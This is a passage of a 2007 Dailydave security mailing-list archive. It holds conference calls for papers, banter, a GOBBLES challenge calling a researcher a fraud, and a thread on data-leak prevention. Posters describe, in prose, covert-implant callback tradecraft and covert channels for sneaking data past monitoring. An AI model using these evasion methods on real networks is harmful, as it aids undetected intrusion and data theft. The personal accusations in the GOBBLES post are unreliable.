2007 16:11:17 +0200 Subject: [Dailydave] CfP: Hack.lu 2007 Message-ID: <1b8ceb1b0704180711l48200644ka03d55223ab44a3b@mail.gmail.com> ======================================== Call for Papers Hack.lu 2007 ======================================== The purpose of the hack.lu convention is to give an open and free playground where people can discuss the implication of new technologies in society. hack.lu is a balanced mix convention where technical and non-technical people can meet each others and share freely all kind of information. The convention will be held in the Grand-Duchy of Luxembourg in October 2007 (18-20.10.2007). Scope ====== Topics of interest include, but are not limited to : * Software Engineering and Security * Honeypots/Honeynets * Spyware, Phishing and Botnets (Distributed attacks) * Newly discovered vulnerabilities in software and hardware * Electronic/Digital Privacy * Wireless Network and Security * Attacks on Information Systems and/or Digital Information Storage * Electronic Voting * Free Software and Security * Assessment of Computer, Electronic Devices and Information Systems * Standards for Information Security * Legal and Social Aspect of Information Security * Software Engineering and Security * Security in Information Retrieval * Network security Deadlines ========= The following dates are important if you want to participate in the CfP Abstract submission : no later than 1 June 2007 Full paper submission : no later than 15 July 2007 Notification date : around end of July beginning of August Submission guideline ==================== Authors should submit a paper in English up to 5.000 words, using a non-proprietary and open electronic format. The program committee will review all papers and the author of each paper will be notified of the result, by electronic means. Abstract is up to 400 words. Submissions must be sent to : hack2007-paper(AT)hack.lu Submissions should also include the following: 1. Presenter, and geographical location (country of origin/passport)and contact info. 2. Employer and/or affiliations. 3. Brief biography, list of publications or papers. 4. Any significant presentation and/or educational experience/background. 5. Reason why this material is innovative or significant or an important tutorial. 6. Optionally, any samples of prepared material or outlines ready. The information will be used only for the sole purpose of the hack.luconvention including the information on the public website. If you want to remain anonymous, you have the right to use a nickname. Speakers' Privileges ==================== * Accommodation will be provided (max 3 nights) * Travel expenses will be covered * Conference speakers night * speakers goodies... Program Committee ================= http://www.hack.lu/index.php/ProgramCommittee Publication and rights ====================== Authors keep the full rights on their publication/papers but give an unrestricted right to redistribute their papers for the hack.lu convention and its related electronic/paper publication. Sponsoring ========== If you want to support the initiative and gain visibility by sponsoring, please contact us by writing an e-mail to info(AT)hack.lu Web site and wiki ================= http://www.hack.lu/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070418/a1d003e1/attachment.htm From dave at immunityinc.com Thu Apr 19 01:38:02 2007 From: dave at immunityinc.com (Dave Aitel) Date: Thu, 19 Apr 2007 01:38:02 -0400 Subject: [Dailydave] Hacker opsec case study Message-ID: <4627003A.6080503@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 http://news.yahoo.com/s/ap/20070419/ap_on_hi_te/hackers_state_department This is a great article from the perspective of "How long in the State dept. does one Word 0day buy you." It's like a hacker opsec case study. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGJwA5tehAhL0gheoRAvbmAJ9YSgtu9fBKuJqoCkbrBWSeEbtIngCdEn/R YL/rw3zpGJS5FCY3h2/zW4A= =ydkC -----END PGP SIGNATURE----- From lists at isecom.org Thu Apr 19 04:22:38 2007 From: lists at isecom.org (Pete Herzog) Date: Thu, 19 Apr 2007 10:22:38 +0200 Subject: [Dailydave] Hacker opsec case study In-Reply-To: <4627003A.6080503@immunityinc.com> References: <4627003A.6080503@immunityinc.com> Message-ID: <462726CE.40009@isecom.org> I think this says more about the poor defensive technique of "patching" and reliance upon it than about the 0day itself. -pete. Dave Aitel wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > http://news.yahoo.com/s/ap/20070419/ap_on_hi_te/hackers_state_department > > This is a great article from the perspective of "How long in the State > dept. does one Word 0day buy you." > > It's like a hacker opsec case study. > > - -dave > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > > iD8DBQFGJwA5tehAhL0gheoRAvbmAJ9YSgtu9fBKuJqoCkbrBWSeEbtIngCdEn/R > YL/rw3zpGJS5FCY3h2/zW4A= > =ydkC > -----END PGP SIGNATURE----- > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > From mwollenweber at gmail.com Thu Apr 19 11:10:10 2007 From: mwollenweber at gmail.com (matthew wollenweber) Date: Thu, 19 Apr 2007 11:10:10 -0400 Subject: [Dailydave] Hacker opsec case study In-Reply-To: <4627003A.6080503@immunityinc.com> References: <4627003A.6080503@immunityinc.com> Message-ID: <42210a440704190810s3d9d5913u17409798b0ea3b49@mail.gmail.com> As in infosec contactor "working for the government in the Baltimore/Washington Metro" I often see a lot of crazy things. Often intrusion sets are defined and detected like they are in the corporate world: by a signature rule-set and ip location (address range). Usually the rule-set is created after the attacker does something obvious like pulling down gigs of data in one night to an unfriendly state. To me this implies that they expect to get noticed. I have seldom (almost never) seen an attack discovered where the technology was something I'd consider doing such as: 1. Non-public implant with http call backs to a dynamic dns server 2. Call backs are slow and initially occur a while after exploitation 3. You don't use encryption (its generally easy to detect) 4. Traffic is to/from "safe" IPs -- lets say if you were a local power company well then traffic to Russia is unexpected but traffic to a local small business is generally "safe". 5. You don't do something stupid (your version of windows is non-us, you scan from your IP, etc). To me those are basic steps when performing a covert pen-test (modified to be legal and compliant with the rules of engagement). I can't imagine that a nation state would do any less. There's at least the first clear mistake of calling back to Asia and Congress men are quoted as *"These are experienced, sophisticated people who are trying to exploit our vulnerabilities and gain access to our information," Thompson said. *And a second is implied by *tripwires severed Internet connections in the region after a limited amount of data was detected being stolen* (I've seldom seen a "tripwire" that wasn't tuned to sever connections until something blatently bad was occurring). So things are bad when one Word 0-day gives you prologned access to US govt assets, but it's even worse when the attacker was doing some dumb things and the people in charge think the attack was extremely sophisticated and beyond the skill and resource level of a 20-something computer science student. On 4/19/07, Dave Aitel wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > http://news.yahoo.com/s/ap/20070419/ap_on_hi_te/hackers_state_department > > This is a great article from the perspective of "How long in the State > dept. does one Word 0day buy you." > > It's like a hacker opsec case study. > > - -dave > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > > iD8DBQFGJwA5tehAhL0gheoRAvbmAJ9YSgtu9fBKuJqoCkbrBWSeEbtIngCdEn/R > YL/rw3zpGJS5FCY3h2/zW4A= > =ydkC > -----END PGP SIGNATURE----- > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -- Matthew Wollenweber mwollenweber at gmail.com skytel: 800-206-3041 | 2063041 at skytel.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070419/99253dcb/attachment.htm From dave at immunityinc.com Thu Apr 19 12:57:19 2007 From: dave at immunityinc.com (Dave Aitel) Date: Thu, 19 Apr 2007 12:57:19 -0400 Subject: [Dailydave] Revision control is great. Message-ID: <46279F6F.2000102@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Today in the great white north, the train was late by ten minutes. At first I thought there was going to be a riot, but then everyone just huddled into the stairwell for warmth like a group of emperor penguins. Anyways, since I'm teaching, I mostly fix CANVAS bugs and prepare for class all night, but I've been slowly working on a new thing, which I hope will be done soon. Essentially the problem is that I want a bunch of people to be able to comment up a disassembly all at the same time, much like we all code on one exploit at the same time. I also am tired of commenting the same parts of dll's on various VM's just in different language packs. Bindiff solves the second problem, but there's a small part of this problem that I don't need a Bindiff to solve, and I still want to solve it. Likewise there are other issues I'd like to solve peripherally, and they're all built using different tools that don't work together. So I want to expose all those tools to each other and to my disassembler. Anyways, my attempted solution is this: When you click "export" in ImmDBG, I want it to export a semi-portable mapping file with all your names and comments and other data (analysis data or type data from unmidl, for example) to an XML file. If you want to include arbitrary Python objects in there as marshalled strings, that's cool too. Whatever you want goes into this structured XML file, which is then automatically synced to the main server with CVS/SVN. This buys us revision control for free. So when I install ImmDBG on some random VM, I point it at the company SVN server, and every time I attach to something any comments I'd done on those DLL's before get automatically imported, updated, changed, and commited. Likewise if I want to work on the XML file with PaiMai or Bindiff or whatever else, I can do that quite quickly and easily. And the whole team can work together the exact same way they work together on source code, using the exact same toolset they're used to. Just an idea. - -dave - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGJ59utehAhL0gheoRAiKvAJ0bQEvUt/gASpAvIKg1IojYOF9wRgCfWDbN lDkIL5Q3sFJ9Tsx4ZRzhctQ= =Ih/S -----END PGP SIGNATURE----- From dominique.brezinski at gmail.com Thu Apr 19 12:59:27 2007 From: dominique.brezinski at gmail.com (Dominique Brezinski) Date: Thu, 19 Apr 2007 09:59:27 -0700 Subject: [Dailydave] Hacker opsec case study In-Reply-To: <462726CE.40009@isecom.org> References: <4627003A.6080503@immunityinc.com> <462726CE.40009@isecom.org> Message-ID: <597760c90704190959k405fb1e1x1e7a3b55460bb1ef@mail.gmail.com> I think Dave's point was related to how far they got once they had their foot in the door on one workstation. I have a lot of experience related to assessing the risks associated with workstation compromise through client-side/data-driven exploits and first-hand experience seeing how far a skilled adversary can get. Dave seems to be saying this serves as a good case study to that affect, which I would agree with. Dom On 4/19/07, Pete Herzog wrote: > I think this says more about the poor defensive technique of "patching" and > reliance upon it than about the 0day itself. > > -pete. > > > Dave Aitel wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > http://news.yahoo.com/s/ap/20070419/ap_on_hi_te/hackers_state_department > > > > This is a great article from the perspective of "How long in the State > > dept. does one Word 0day buy you." > > > > It's like a hacker opsec case study. > > > > - -dave > > -----BEGIN PGP SIGNATURE----- > > Version: GnuPG v1.4.6 (GNU/Linux) > > > > iD8DBQFGJwA5tehAhL0gheoRAvbmAJ9YSgtu9fBKuJqoCkbrBWSeEbtIngCdEn/R > > YL/rw3zpGJS5FCY3h2/zW4A= > > =ydkC > > -----END PGP SIGNATURE----- > > > > _______________________________________________ > > Dailydave mailing list > > Dailydave at lists.immunitysec.com > > http://lists.immunitysec.com/mailman/listinfo/dailydave > > > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From dave at immunityinc.com Thu Apr 19 18:19:40 2007 From: dave at immunityinc.com (Dave Aitel) Date: Thu, 19 Apr 2007 18:19:40 -0400 Subject: [Dailydave] .sg has cold beer! Message-ID: <4627EAFC.4090803@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 http://www.syscan.org/ call for papers expires April 30th! Recommend talk title: "One hour of Microsoft Word 0days: We release one 0day a minute for one hour. Then we eat stingray and drink beer." Remember, 9 out of 10 hackers prefer to drink with Thomas Lim! - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGJ+r7tehAhL0gheoRAlfEAJ9lE+xN4Jbj6Ig3ITQ5uVTFBViDEwCggokM 2sYY+AJrCSwk6Z/oCNHTO6w= =lQji -----END PGP SIGNATURE----- From gobbles at hushmail.com Sat Apr 21 14:54:07 2007 From: gobbles at hushmail.com (gobbles at hushmail.com) Date: Sat, 21 Apr 2007 14:54:07 -0400 Subject: [Dailydave] GOBBLES is calling out Dr. Neal Krawetz. Message-ID: <20070421185415.D7430C383D@mailserver10.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dear fans, Below is an email we sent to Dr. Neal Krawetz, author of "who_is_n3td3v.pdf", a document that uses flawed logic to "prove" that GOBBLES Security members are behind the alias n3td3v, which obviously is not true. We have tried numerous times to establish contact with the good doctor, and to have him publish an apology and retract his libelous allegations. He is however adamant in his position that he is correct, and refuses to entertain any evidence presented that proves his conclusions contrary. Since he is no longer answering our emails, and authoring articles on the subject of internet character defamation for securityfocus, we have no choice but to call him on his bullshit publicly. If you run a security conference and would like to provide the venue for the challenge described below, please contact us immediately. For the record, we have never had anything to do with the online identity n3td3v, and to our collective knowledge have had no contact in any way with the individual(s) behind the alias. Also for the record, Neal Krawetz is an academic fraud who cannot cite the source of the axioms he constantly refers to, since the basis of all his research is clearly horseshit. In God We Trust, GOBBLES Security Neal, Since you have forced us out of retirement, perhaps you would be interested in helping us back into retirement? A proposal is in the works for an upcoming security conference (no, we haven't decided which yet - perhaps we can publish the proposal then see which organizers make the best offer to us?) where we send a representative (from our defunct, dissolved, and otherwise nonexistent organization) to the conference to meet with you, in person. The conference organizer will be responsible for providing an unbiased polygraph and polygraph technician. There should be two rounds to the presentation. Round one is with our representative taking the polygraph, with you administrating the questions. The realm of questioning shall be strictly limited to your observations and conclusions from your paper. This seems like the best way to put your methodology to the test, because otherwise it's simply a game of heresy and you'll continue to take the upper ground because there simply is no way to prove or disprove your claims. The second round will be with you taking the polygraph, and our representative administering the questions. Again, the scope of the questioning will be strictly limited to your work, your confidence in your observations, and those sorts of things. We will not make this a personal attack of any sort, and expect the same level of professionalism from you. Perhaps we should send lists of questions directly to the conference organizer, who can review and censor the questions as deemed appropriate, that way neither you or our representative can blindside with unfair questions that are not a part of the presentation. After both rounds of questioning, the polygraph technician can then draw conclusions from their tests, and declare Gobbles Security or Neal Krawetz as the winner of the scientific challenge. To the victor goes the spoils, and if our representative indeed wins this contest, and proves by scientific measure your research and conclusions are absolutely wrong, we want you to surrender your Texas A&M supplied PhD. If you win, we are not sure what you would want as a prize from us, so we will leave that up to you. Along with your demands, we will also resign and dissolve once again, and promise to never be heard from again. If you are the victor, you will have defeated the evil hackers and made the interweb a much safer place! You will be a hero to the masses, and have the title of "Greatest Computer Security Hero" for the rest of your life! So, are you game? Do you have confidence in your scientific process, claims, and conclusions? Are you willing to put yourself to the test, in a public forum? Please let us know within one calender week from today (10/4/2007) so we can progress! There will be a lot of planning that both parties will need to do, so let's get moving on this ASAP! Thank you for your time, Gobbles Security :) -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wkYEARECAAYFAkYqXUgACgkQHNGnlyGZsA+zWACggnUmO/7lApYKVLxaT4y58HIx6/8A njkXfhyijSXufDIK81yWE5Wjheed =PC8G -----END PGP SIGNATURE----- From nahual at 0hday.org Tue Apr 24 16:09:45 2007 From: nahual at 0hday.org (El Nahual) Date: Tue, 24 Apr 2007 15:09:45 -0500 Subject: [Dailydave] CFP it1tk1 '07 In-Reply-To: <462726CE.40009@isecom.org> References: <4627003A.6080503@immunityinc.com> <462726CE.40009@isecom.org> Message-ID: <462E6409.6030903@0hday.org> ====================== Call for Papers it1tk1 '07 ====================== The purpose of it1tk1 is to have an open environment where people can discuss new technologies both in attack and defense strategies and new trends and research. it1tk1 '07 is a highly technical convention in which technical and non-technical people can meet each other and have a great time talking, sharing information and more. The convention will be held in Mexico City from 23th to the 28th of October (we know it looks long but it has 2 stages) Stage 1: Corporative Track (23th, 24th) This track will have technical and not so technical talks, based mostly in defensive and some offensive oriented techniques and trends, mostly for technical and non-technical people. Stage 2: Technical/Hacker Track (26th, 28th) This track is a no hold barred technical talks, in our true sense, we shall Capture The Flag (CTF), Throw the CellPhone (TTCP), Wall Of Shame, 1 Hour for improvised talks and much more... We hope you enjoy it! Scope ====== Topics of interest include, but are not limited to : * Software Engineering and Security * Spyware, Phishing and Botnets (Distributed attacks) * Newly discovered vulnerabilities in software and hardware * Wireless Network and Security * Attacks on Information Systems and/or Digital Information Storage * Electronic Voting * Electronic Money * Free Software and Security * Assessment of Computer, Electronic Devices and Information Systems * Standards for Information Security * Forensics * Network security * GSM Security Deadlines ========= The following dates are important if you want to send us your talks: * Abstract submission : no later than 15 June 2007 * Full paper submission : no later than 25 July 2007 * Notification date : Second week of August 2007 Submission guideline ==================== Authors should submit a paper in English up to 5.000 words. The program committee will review all papers and the author of each paper will be notified of the result, the committee will contact the author if any question of more information is needed. Abstract is up to 400 words. Submissions must be sent to : cfp(AT)it1tk1.org Submissions should also include the following: 1. Personal Information including geographical location (country of origin/passport)and contact info. 2. Employer and/or affiliations. 3. Brief biography, list of publications or papers. 4. Any significant presentation and/or educational experience/background. 5. Reason why this material is innovative or significant or an important tutorial. * Optional: Samples of prepared material or outlines ready. The information will be used only for it1tk1 including the information on the public website. If you want to remain anonymous, you have the right to use a nickname. Speakers' Privileges ==================== * Accommodation will be provided (1 week) * Travel expenses will be covered (flight up to 2,500 USD) * Conference speakers night * Parties * Visits to tourist places (piramids, shopping and other stuff) * Did we say more parties? Publication and rights ====================== Authors keep the full rights on their publication/papers but give an unrestricted right to redistribute their papers for it1tk1 and its related electronic/paper publication. Sponsoring ========== If you want to support the initiative and gain visibility by sponsoring, please contact us by writing an e-mail to sponsors(AT)it1tk1.org From arunkoshy at gmail.com Wed Apr 25 08:49:36 2007 From: arunkoshy at gmail.com (Arun Koshy) Date: Wed, 25 Apr 2007 22:49:36 +1000 Subject: [Dailydave] time for my lil opinion poll Message-ID: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com> A friend from the vuln research arena ( sorry .. no names etc ) told me in a convo a few hours ago that this does not work : http://en.wikipedia.org/wiki/Information_Leak_Prevention Would like to know the community's opinion about the whole arena .. both public and private responses ( if you can't be public ) are welcome. From chris at ngssoftware.com Wed Apr 25 10:38:08 2007 From: chris at ngssoftware.com (Chris Anley) Date: Wed, 25 Apr 2007 15:38:08 +0100 Subject: [Dailydave] time for my lil opinion poll In-Reply-To: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com> References: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com> Message-ID: <462F67D0.4080807@ngssoftware.com> Arun Koshy wrote: > A friend from the vuln research arena ( sorry .. no names etc ) told > me in a convo a few hours ago that this does not work : > > http://en.wikipedia.org/wiki/Information_Leak_Prevention > > Would like to know the community's opinion about the whole arena .. > both public and private responses ( if you can't be public ) are > welcome. Your friend is possibly thinking along these lines: http://en.wikipedia.org/wiki/Covert_channel As an example, if the ILP system works solely at the TCP stream level, then a network client or server could pause while transmitting packets, and the host at the other end could measure the pauses. Or you could leak one bit at a time, by establishing connections in odd or even-numbered seconds. Or, since TCP packets can be delivered out of order, if you're sending 'n' packets, you can transmit a number from 1 to n! by re-ordering the packets. In all these examples the TCP stream is identical, but there's additional information the monitoring system is unaware of. Another, more obvious method would be to include the information in any outbound random number, such as a cryptographic session key, TCP ISN, etc. If the information is supposed to be random, how can the monitoring process tell that it isn't? -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 From docbook.xml at gmail.com Wed Apr 25 10:45:12 2007 From: docbook.xml at gmail.com (Ali, Saqib) Date: Wed, 25 Apr 2007 07:45:12 -0700 Subject: [Dailydave] time for my lil opinion poll In-Reply-To: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com> References: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com> Message-ID: what do you mean it doesn't work? These are content control systems that monitor the network gear and PCs to control the flow of the information. Obviously they are not fail-proof, just like traditional cryptography is not "unconditionally secure" saqib http://www.full-disk-encryption.net On 4/25/07, Arun Koshy wrote: > A friend from the vuln research arena ( sorry .. no names etc ) told > me in a convo a few hours ago that this does not work : > > http://en.wikipedia.org/wiki/Information_Leak_Prevention > > Would like to know the community's opinion about the whole arena .. > both public and private responses ( if you can't be public ) are > welcome. > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -- Saqib Ali, CISSP, ISSAP http://www.full-disk-encryption.net From bamm.visscher at gmail.com Wed Apr 25 11:46:04 2007 From: bamm.visscher at gmail.com (Bamm Visscher) Date: Wed, 25 Apr 2007 09:46:04 -0600 Subject: [Dailydave] time for my lil opinion poll In-Reply-To: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com> References: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com> Message-ID: <27492850704250846wf786580g8edc4a6c6d20145e@mail.gmail.com> I've sat through a number of meetings with vendors in the space recently, plus, I stayed at a Holiday Inn last night, so that makes me an expert. Here is my take: There is no doubt that these systems are evadable and all the vendors I spoke with accepted this fact (some had to be pressured more than others). This is especially true if you don't implement host based agents as well as the network appliances. So, if you are shopping this market for the sole purpose of preventing malicious insiders from walking away with your intellectual property, then my opinion is the dollars are better spent on providing HR with the resources it needs for doing things like proper background investigations as well as improving the workplace (crazy how loyal happy employees are). Inadvertant data leakage is a different story. I am an 8th degree black belt in Binfu [0], so I can understand how an individual might accidently email one customer's cost structures to another. These systems can also help enforce compliance with things like HIPAA (are you sure sensitive health information isn't being inadvertantly sent in the clear?). The best component of these systems that I have seen is their abililty to discover "data at rest" (this is usually considered an additional feature). I am a security monitoring and incident response guy by trade so, quickly identifiying if (and what) sensitive data resided on compromised systems is an important piece of information when you are assessing the impact an intrusion has had on a company. Even though I could see some value from the technology, I am still not convinced that the costs are worth it. I am probably going to end up doing a full eval on a few of the products in the space in the near future. In the end I expect the CYA factor to be a leading driver on why companies purchase products in this space and the vendors are pretty good at pushing the FUD. Bammkkkk [0] binfu (bin foo): The fine art of inadvertantly causing unexpected sytem downtime, outages, and file deletions. "binfu" was first used to describe the action of "accidently" performing an "rm -rf" on the directory /usr/bin. Once binfu has been exercised, it is best bystanders stand clear, since vulgar language and flying objects often follow the use of binfu. "My your binfu is so excellent." - Bamm to Rich (circa 2000) On 4/25/07, Arun Koshy wrote: > A friend from the vuln research arena ( sorry .. no names etc ) told > me in a convo a few hours ago that this does not work : > > http://en.wikipedia.org/wiki/Information_Leak_Prevention > > Would like to know the community's opinion about the whole arena .. > both public and private responses ( if you can't be public ) are > welcome. > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -- sguil - The Analyst Console for NSM http://sguil.sf.net From security at sligoinc.com Wed Apr 25 12:26:32 2007 From: security at sligoinc.com (Security Guy) Date: Wed, 25 Apr 2007 12:26:32 -0400 Subject: [Dailydave] time for my lil opinion poll In-Reply-To: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com> References: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com> Message-ID: <92db0b590704250926x6796b145obe4581629be6cfac@mail.gmail.com> I think this is one of those technical 'solutions' for a people problem (Pre-screen your personnel, make them sign NDAs, use security awareness training to remind them of sensitive information protection and consequences of violation, etc etc). you can also prevent the wider problem by not allowing business computers to connect to the Internet (gasp!) I think there is some value for these in organizations that actually some sort of intelligent data priority and tagging scheme, but the horse must come before the cart. I think if a company considering an extrusion prevention system first took stock of how it's currently protecting their sensitive data, they could probably find ways to spend the money more effectively. So in short: yes they probably work, as well as IDS works (that is: not very well, requiring tons of care and feeding and understanding of the organization to be effective and needing help with encrypted traffic) On 4/25/07, Arun Koshy wrote: > A friend from the vuln research arena ( sorry .. no names etc ) told > me in a convo a few hours ago that this does not work : > > http://en.wikipedia.org/wiki/Information_Leak_Prevention > > Would like to know the community's opinion about the whole arena .. > both public and private responses ( if you can't be public ) are > welcome. > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -- -Karl From phatbuckett at gmail.com Wed Apr 25 13:57:38 2007 From: phatbuckett at gmail.com (Darren Spruell) Date: Wed, 25 Apr 2007 10:57:38 -0700 Subject: [Dailydave] time for my lil opinion poll In-Reply-To: References: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com> Message-ID: <839aec700704251057m41ea18b5nb5a35d3e13359dc8@mail.gmail.com> On 4/25/07, Ali, Saqib wrote: > what do you mean it doesn't work? These are content control systems > that monitor the network gear and PCs to control the flow of the > information. > > Obviously they are not fail-proof, just like traditional cryptography > is not "unconditionally secure" Because they don't actually do what the marketing people behind the product say they do? Because they instill a false sense of security? http://www.mcafee.com/us/enterprise/products/data_loss_prevention/: " Safeguard against loss of customer data, employee information, and intellectual property from all possible channels. " Yeah, right. DS > > saqib > http://www.full-disk-encryption.net > > > On 4/25/07, Arun Koshy wrote: > > A friend from the vuln research arena ( sorry .. no names etc ) told > > me in a convo a few hours ago that this does not work : > > > > http://en.wikipedia.org/wiki/Information_Leak_Prevention > > > > Would like to know the community's opinion about the whole arena .. > > both public and private responses ( if you can't be public ) are > > welcome. > > _______________________________________________ > > Dailydave mailing list > > Dailydave at lists.immunitysec.com > > http://lists.immunitysec.com/mailman/listinfo/dailydave > > > > > -- > Saqib Ali, CISSP, ISSAP > http://www.full-disk-encryption.net > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -- Darren Spruell phatbuckett at gmail.com From fw at deneb.enyo.de Wed Apr 25 13:58:20 2007 From: fw at deneb.enyo.de (Florian Weimer) Date: Wed, 25 Apr 2007 19:58:20 +0200 Subject: [Dailydave] time for my lil opinion poll In-Reply-To: <462F67D0.4080807@ngssoftware.com> (Chris Anley's message of "Wed, 25 Apr 2007 15:38:08 +0100") References: <1d0ba3070704250549o3d07836au4e32d4c9dce577c2@mail.gmail.com> <462F67D0.4080807@ngssoftware.com> Message-ID: <87slaoz683.fsf@mid.deneb.enyo.de> * Chris Anley: > As an example, if the ILP system works solely at the TCP stream level, > then a network client or server could pause while transmitting packets, > and the host at the other end could measure the pauses. Or you could > leak one bit at a time, by establishing connections in odd or > even-numbered seconds. The issues are much more mundane. Companies usually don't want their sales people to leak details about their products to the competition. So they look for software that detects such leaks. The problem: The data to be protected is stored in an Excel spreadsheet -- and disconnected operation is a must. I expect that it's possible to detect the casual leaker, but prevention is much harder (and might give too many clues to the attackers). 8-/ > NGS and NGSSoftware are trading names of Next Generation Security > Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 > 4BF with Company Number 04225835 and VAT Number 783096402 I think you also need to list the names of some company officials, such as the CEO. And of course, you must archive your message for five (or ten?) years as well if you think you're forced to add that footer. From dan at geer.org Thu Apr 26 01:24:43 2007 From: dan at geer.org (dan at geer.org) Date: Thu, 26 Apr 2007 01:24:43 -0400 Subject: [Dailydave] time for my lil opinion poll In-Reply-To: Your message of "Wed, 25 Apr 2007 07:45:12 PDT." Message-ID: <20070426052443.E8C461BF924@absinthe.tinho.net> On 4/25/07, Arun Koshy wrote: -+------------------------------------------------- | A friend from the vuln research arena ( sorry .. no names etc ) told | me in a convo a few hours ago that this does not work : | | http://en.wikipedia.org/wiki/Information_Leak_Prevention Disclaimer: I work for Verdasys, one of the firms listed on http://en.wikipedia.org/wiki/Information_Leak_Prevention "Does not work" is a little like "Bad dog" -- could you be a little more specific? Content inspection? Crap, in my view, as it only works when the opponent does not know or care that you are watching (Pig Latin is enough crypto to defeat). Specific blocks of this and that, e.g., the electronic equivalent of sealing the USB port with a glue gun? Well, sure, but how many ways to steal data are there... What we (Verdasys) sell is, in blunt terms, a commercial version of the Orange Book "Reference Monitor" implemented as a data-surveillance rootkit. Compared to the others, ours is an Oxy-Acetylene torch to their paper match. Before I go on, do we really want to have the full tilt debate? --dan, exhausted and on lousy wireless in a cheap motel From dave at immunityinc.com Thu Apr 26 09:54:37 2007 From: dave at immunityinc.com (Dave Aitel) Date: Thu, 26 Apr 2007 09:54:37 -0400 Subject: [Dailydave] Happy Birthday To Brad Spengler Message-ID: <4630AF1D.1090202@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I have to wear a suit today, otherwise I'd wear the "Brad Protects Us" tee-shirt. For those of you who don't know Brad - grsecurity.org has some information on his main project, a "for hackers, by hackers" kernel patch. Because hackers hate getting owned while they own you. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGMK8bB8JNm+PA+iURAkIcAKCOMq148rKnlzDkET3wNgk8q2DJiACfa52z 6haMnFmlF/6V9H1j1U8Sniw= =yqih -----END PGP SIGNATURE----- From lmh at info-pull.com Thu Apr 26 10:20:45 2007 From: lmh at info-pull.com (LMH) Date: Thu, 26 Apr 2007 16:20:45 +0200 Subject: [Dailydave] Happy Birthday To Brad Spengler In-Reply-To: <4630AF1D.1090202@immunityinc.com> References: <4630AF1D.1090202@immunityinc.com> Message-ID: No "BigHAWK Revisited" lecture today? Happy birthday to Brad... or as a good old, well known fellow would say, "he has enough blackhat friends that could arrange another Dirty Sanchez party for you". ;o) On 4/26/07, Dave Aitel wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > I have to wear a suit today, otherwise I'd wear the "Brad Protects Us" > tee-shirt. > > For those of you who don't know Brad - grsecurity.org has some > information on his main project, a "for hackers, by hackers" kernel > patch. Because hackers hate getting owned while they own you. > > - -dave > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > > iD8DBQFGMK8bB8JNm+PA+iURAkIcAKCOMq148rKnlzDkET3wNgk8q2DJiACfa52z > 6haMnFmlF/6V9H1j1U8Sniw= > =yqih > -----END PGP SIGNATURE----- > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From dave.korn at artimi.com Thu Apr 26 14:45:17 2007 From: dave.korn at artimi.com (Dave Korn) Date: Thu, 26 Apr 2007 19:45:17 